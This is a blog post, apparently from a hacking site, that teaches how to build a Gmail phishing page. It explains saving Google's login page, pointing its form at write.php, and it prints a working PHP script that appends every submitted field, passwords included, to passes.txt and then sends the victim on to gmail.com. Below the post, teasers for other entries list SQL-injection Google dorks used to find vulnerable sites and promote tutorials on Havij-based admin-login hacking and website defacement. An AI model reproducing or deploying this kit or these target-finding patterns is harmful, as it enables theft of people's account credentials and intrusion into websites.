Skip to main content

How to create gmail phishing page | Gmail hacking


Phishing is one of the best way to hack gmail account. I had already posted some articles on phishing but few of those are not available due to post loss in website transfer. So i am writing an article again.
To create phishing page of gmail, first of all open gmail in your browser. Then click on file and then save as.

Now you have saved gmail login page to your system.
Now open the saved page in notepad or or any other html editor tool. Now search for form tag <form
You will see some thing like this <form id=”gaia_loginform” action=”https://accounts.google.com/ServiceLoginAuth” method=”post”>The form is set to send the data to url given in action attribute.
Change action attribute to write.php
<form id=”gaia_loginform” action=”write.php” method=”post”> Now form will send data to your write.php
Now create a file write.php in the same directory and write
<?php
header("Location: http://www.gmail.com/");
$handle = fopen("passes.txt", "a");
foreach($_POST as $variable => $value)
 {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Comments

Post a Comment

Popular posts from this blog

World Largest SQL Google Dork Colection

 inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurllay_old.php?id= inurl:declaration_more.php?decl_id= inurlageid= inurl:games.php?id= inurlage.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num=

Hack WebSite’s Admin login Using Havij Sql Injection Tool Full Detailed with Example Sites and ScreenShots

Hi Friends in this Tutorial i will Tell you How to Hack Web Sites With  Sql Injection  tool, there are hug of sql vulnerable sites available for deface.. You Can Learn Step by Step this Tutorials. I made this Tutorial with alot of details and examples.

Make Deface Pages For Hacking Sites With Two MethoD

1st Method!!! In this Method i will tell you how to make Deface page With Advance Deface page Creator Tool